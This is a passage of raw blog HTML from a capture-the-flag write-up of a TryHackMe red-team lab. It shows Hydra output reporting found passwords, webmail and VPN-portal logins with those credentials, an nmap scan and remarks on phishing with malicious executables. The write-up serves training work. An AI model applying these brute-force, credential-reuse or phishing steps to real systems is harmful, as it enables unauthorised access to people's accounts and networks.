style=\"color: #C3E88D\">target<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">successfully<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">completed,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">valid<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">passwords<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">found<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Hydra<\/span><span style=\"color: #BABED8\"> (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-02-06 11:27:17<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09106146&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09106146\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"421\" data-attachment-id=\"462\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206112906\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?fit=1685%2C692&amp;ssl=1\" data-orig-size=\"1685,692\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206112906\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?fit=1024%2C421&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?resize=1024%2C421&#038;ssl=1\" alt=\"\" class=\"wp-image-462\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?resize=1024%2C421&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?resize=300%2C123&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?resize=768%2C315&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?resize=1536%2C631&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206112906.png?w=1685&amp;ssl=1 1685w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Luckily, we found two sets of credentials! We can use them now and try logging in to the Webmail app. Oftentimes, getting access to user mailboxes can be very useful as there are high chances of finding sensitive information in them.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" data-attachment-id=\"463\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206111805\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?fit=2179%2C1249&amp;ssl=1\" data-orig-size=\"2179,1249\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206111805\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?fit=1024%2C587&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=1024%2C587&#038;ssl=1\" alt=\"\" class=\"wp-image-463\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=1024%2C587&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=300%2C172&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=768%2C440&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=1536%2C880&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111805.png?resize=2048%2C1174&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"660\" data-attachment-id=\"464\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206111930\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?fit=1918%2C1236&amp;ssl=1\" data-orig-size=\"1918,1236\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206111930\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?fit=1024%2C660&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?resize=1024%2C660&#038;ssl=1\" alt=\"\" class=\"wp-image-464\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?resize=1024%2C660&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?resize=300%2C193&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?resize=768%2C495&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?resize=1536%2C990&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206111930.png?w=1918&amp;ssl=1 1918w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Unfortunately, both user inboxes are empty. We can still make use of this access to carry out further attacks such as Phishing. We can send Phishing emails to steal sensitive information from other users such as their credentials. We can also try to catch a shell on their machine by weaponizing the Phishing email with a malicious executable payload. When the user clicks on the malicious file, we get a shell on the machine. <\/p>\n\n\n\n<p>For now, we will move on to enumerate other machines and come back to Phishing if we can&#8217;t find a way to get a foothold on the network.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"17-vpn-machine-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">VPN Machine<\/mark><\/h3>\n\n\n\n<p>Out of three hosts with potential entry points to the network, we have enumerated and gathered information from the WEB and MAIL machines. We will start an NMAP scan on the VPN machine to find out open ports and services running.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"18-nmap-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">NMAP<\/mark><\/h4>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone\/VPN]\n\u2514\u2500$ nmap -p- vpn.thereserve.loc -A nmap\/vpn-fullscan\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-02-06 11:58 CST\nUnable to split netmask from target expression: &quot;nmap\/vpn-fullscan&quot;\nNmap scan report for vpn.thereserve.loc (10.200.113.12)\nHost is up (0.20s latency).\nNot shown: 65525 closed tcp ports (conn-refused)\nPORT      STATE    SERVICE  VERSION\n22\/tcp    open     ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 02:08:13:2d:6b:a2:0d:9b:97:4b:54:7e:ac:5d:29:a7 (RSA)\n|   256 13:13:fb:37:7e:4e:ec:f2:b8:0e:13:74:75:32:c2:10 (ECDSA)\n|_  256 de:f8:5c:79:45:d3:b2:77:0b:31:0a:7e:14:3c:82:37 (ED25519)\n80\/tcp    open     http     Apache httpd 2.4.29 ((Ubuntu))\n|_http-title: VPN Request Portal\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone\/VPN<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">vpn.thereserve.loc<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-A<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">nmap\/vpn-fullscan<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Starting<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.94<\/span><span style=\"color: #C3E88D\">SVN<\/span><span style=\"color: #BABED8\"> ( <\/span><span style=\"color: #C3E88D\">https:\/\/nmap.org<\/span><span style=\"color: #BABED8\"> ) at 2024-02-06 11:58 CST<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Unable<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">split<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">netmask<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">from<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">target<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">expression:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">nmap\/vpn-fullscan<\/span><span style=\"color: #89DDFF\">&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Nmap<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">scan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">report<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">for<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">vpn.thereserve.loc<\/span><span style=\"color: #BABED8\"> (10.200.113.12)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">up<\/span><span style=\"color: #BABED8\"> (0.20s <\/span><span style=\"color: #C3E88D\">latency<\/span><span style=\"color: #BABED8\">).<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">shown:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">65525<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">closed<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tcp<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ports<\/span><span style=\"color: #BABED8\"> (conn-refused)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">PORT<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">STATE<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">SERVICE<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">VERSION<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">22\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">OpenSSH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">7.6<\/span><span style=\"color: #C3E88D\">p1<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Ubuntu<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #C3E88D\">ubuntu0.5<\/span><span style=\"color: #BABED8\"> (Ubuntu <\/span><span style=\"color: #C3E88D\">Linux<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">protocol<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.0<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">ssh-hostkey:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">2048<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">02<\/span><span style=\"color: #C3E88D\">:08:13:2d:6b:a2:0d:9b:97:4b:54:7e:ac:5d:29:a7<\/span><span style=\"color: #BABED8\"> (RSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">13<\/span><span style=\"color: #C3E88D\">:13:fb:37:7e:4e:ec:f2:b8:0e:13:74:75:32:c2:10<\/span><span style=\"color: #BABED8\"> (ECDSA)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">256<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">de:f8:5c:79:45:d3:b2:77:0b:31:0a:7e:14:3c:82:37<\/span><span style=\"color: #BABED8\"> (ED25519)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">80\/tcp<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">open<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">http<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #C3E88D\">Apache<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">httpd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2.4<\/span><span style=\"color: #C3E88D\">.29<\/span><span style=\"color: #BABED8\"> ((Ubuntu))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-title:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">VPN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Request<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Portal<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_http-server-header:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Apache\/2.4.29<\/span><span style=\"color: #BABED8\"> (Ubuntu)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>We have only two ports open:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>22 for SSH<\/li>\n\n\n\n<li>80 for HTTP<\/li>\n<\/ul>\n\n\n\n<p>Trying SSH on the VPN machine using the credentials we obtained won&#8217;t work. We will move on to Port 80.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"19-http-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">HTTP<\/mark><\/h4>\n\n\n\n<p>The web page has a login form for the VPN server. Fortunately, the credentials we have for <code>laura.wood@thereserve.loc<\/code> and <code>mohammad.ahmed@thereserve.loc<\/code> works here!<\/p>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09106d2c&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09106d2c\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"582\" data-attachment-id=\"466\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206100001\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?fit=1760%2C1000&amp;ssl=1\" data-orig-size=\"1760,1000\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206100001\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?fit=1024%2C582&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?resize=1024%2C582&#038;ssl=1\" alt=\"\" class=\"wp-image-466\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?resize=1024%2C582&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?resize=300%2C170&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?resize=768%2C436&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?resize=1536%2C873&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206100001.png?w=1760&amp;ssl=1 1760w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091072d5&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091072d5\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"785\" data-attachment-id=\"467\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206113851\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?fit=1281%2C982&amp;ssl=1\" data-orig-size=\"1281,982\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206113851\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?fit=1024%2C785&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?resize=1024%2C785&#038;ssl=1\" alt=\"\" class=\"wp-image-467\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?resize=1024%2C785&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?resize=300%2C230&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206113851.png?resize=768%2C589&amp;ssl=1 768w, 